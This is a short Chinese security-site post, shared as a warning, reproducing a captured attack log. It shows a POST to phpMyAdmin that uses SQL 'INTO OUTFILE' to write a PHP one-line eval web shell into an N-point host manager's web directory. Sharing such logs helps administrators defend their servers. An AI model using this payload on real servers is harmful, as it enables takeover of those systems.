_PHP技巧_黑客防线网安服务器维护基地

服务器维护网站维护数据维护系统安全配置
专业定制网站企业建站一条龙、软件定制开发、系统集成
稳定虚机备案一条龙，稳定快捷通道
服务理念诚信守诺客户至上专业精神专心贯注

首页编程学习 PHP技术 PHP技巧

作者：黑客防线网安来源：浏览次数：0

本篇关键词：利用 phpMyAdmin MySQL

一段利用phpMyAdmin，MySQL和N点主机管理系统进行挂马的POST提交一句话木马的代码！
在一客户的机器上提取的，希望大家以后多加小心，这些你认为很安全的位置正是黑客可能利用的位置！

Mon Feb 18 20:49:34 2013 - Url:http://192.168.0.11/import.php?
{IP}:50.77.8.38
{PostData}:-----------------------------7dd13823120224
Content-Disposition: form-data; name="is_js_confirmed"
0
-----------------------------7dd13823120224
Content-Disposition: form-data; name="db"
test
-----------------------------7dd13823120224
Content-Disposition: form-data; name="token"
90a81bbecd0412af348b2a4bfd52f59d
-----------------------------7dd13823120224
Content-Disposition: form-data; name="pos"
0
-----------------------------7dd13823120224
Content-Disposition: form-data; name="goto"
db_sql.php
-----------------------------7dd13823120224
Content-Disposition: form-data; name="zero_rows"
您的 SQL 语句已成功运行
-----------------------------7dd13823120224
Content-Disposition: form-data; name="prev_sql_query"
-----------------------------7dd13823120224
Content-Disposition: form-data; name="sql_query"
Create TABLE a (cmd text NOT NULL);
Insert INTO a (cmd) VALUES('<?php @eval($_POST[cmd])?>');
select cmd from a into outfile 'C:/Program Files/NpointSoft/npointhost1.9.6/web/ss.php';
Drop TABLE IF EXISTS a;
-----------------------------7dd13823120224
Content-Disposition: form-data; name="sql_delimiter"
;
-----------------------------7dd13823120224
Content-Disposition: form-data; name="show_query"
1
-----------------------------7dd13823120224
Content-Disposition: form-data; name="SQL"
执行
-----------------------------7dd13823120224

希望这篇的文章能够对您有所帮助，如果您觉得这篇网站维护教程有用的话，别忘了推荐给您的朋友哦！如果您有好的经验方法，不妨拿出来和大家一起分享：假如每个人都拿出一个经验，那么我们都将额外的获取一堆他人的经验。
请记住本站永久域名：（黑客防线网安服务器维护方案维护基地）Www.Rongsen.Com.Cn

黑客防线网安服务器维护方案本篇连接：http://kj.rongsen.com.cn/show-19647-1.html

网站维护教程更新时间:2013-02-19 10:31:59 【打印此页】【关闭】

3
顶一下0
踩一下

上一篇：PHP提示Notice: Undefined variable的解决办法
下一篇：phpcms v9后台删除验证码方法